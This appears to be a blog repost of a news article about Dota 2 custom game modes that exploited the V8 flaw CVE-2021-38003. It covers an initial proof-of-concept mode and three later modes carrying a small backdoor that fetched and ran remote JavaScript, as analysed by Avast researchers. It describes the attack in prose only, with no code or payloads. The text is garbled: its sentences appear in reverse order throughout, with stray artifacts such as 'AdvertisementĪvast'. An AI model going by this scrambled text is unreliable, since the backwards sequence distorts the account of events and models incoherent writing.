![]() If this was the exploit for CVE-2021-38003, this would result in shellcode execution on the victim machine. The victim dynamically executes the downloaded JavaScript. The game mode’s server code reaches out to the backdoor’s C&C server, downloads a piece of JavaScript code (presumably, the exploit for CVE-2021-38003), and returns the downloaded code back to the victim. The game loads as expected, but in the background, a malicious JavaScript contacts the game mode’s server. The victim enters a game, playing one of the malicious game modes. In an email, Vojtěšek described the operation flow of the backdoor this way: But given they were published by the same developer 10 days after the first mode, Avast says there’s a high likelihood that downloaded code also exploited CVE-2021-38003. The server these three modes contacted was no longer working when Avast researchers discovered the modes. This backdoor can execute arbitrary JavaScript downloaded via HTTP, giving the attacker not only the ability to hide the exploit code, but also the ability to update it at their discretion without having to update the entire custom game mode (and going through the risky game mode verification process). Instead, there’s just a simple backdoor consisting of only about twenty lines of code. There is no file named a nor any JavaScript exploit directly visible in the source code. The malicious code in these new three game modes is much more subtle. These modes-titled “Overdog no annoying heroes” (id 2776998052), “Custom Hero Brawl” (id 2780728794), and Overthrow RTZ Edition X10 XP (id 2780559339)-took a much more covert approach. AdvertisementĪvast researchers went on to find three more custom modes that the same developer had published to Valve. The mode included lots of commented-out code and a file titled “a," further suggesting the mode was a test. While some of the exploit was taken from proof-of-concept code published in the Chromium bug tracker, the mode developer wrote much of it from scratch. Embedded inside the mode was exploit code for CVE-2021-38003. ![]() It was titled “test addon plz ignore” (ID 1556548695) and included a description that urged people not to download or install it. The first game mode published by Valve appears to be a proof-of-concept project for exploiting the vulnerability. The game maker then puts the submissions through a verification process and, if they’re approved, publishes them. They allow people with even basic programming experience to implement their ideas for a game and then submit them to Valve. Besides patching the vulnerability last month, Valve also removed all four modes.Ĭustom modes are extensions or even completely new games that run on top of Dota 2. That same month, the same hacker published three additional game modes that very likely also exploited the vulnerability. Unclear intentionsĪ hacker took advantage of the delay by publishing a custom game mode last March that exploited the vulnerability, researchers from security firm Avast said. Although Google patched the vulnerability in October 2021, Dota 2 developer Valve didn’t update its software to use the patched V8 engine until last month after researchers privately alerted the company that the critical vulnerability was being targeted. The vulnerability, tracked as CVE-2021-38003, resided in the open source JavaScript engine from Google known as V8, which is incorporated into Dota 2. Researchers have unearthed four game modes that could successfully exploit a critical vulnerability that remained unpatched in the popular Dota 2 video game for 15 months after a fix had become available.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |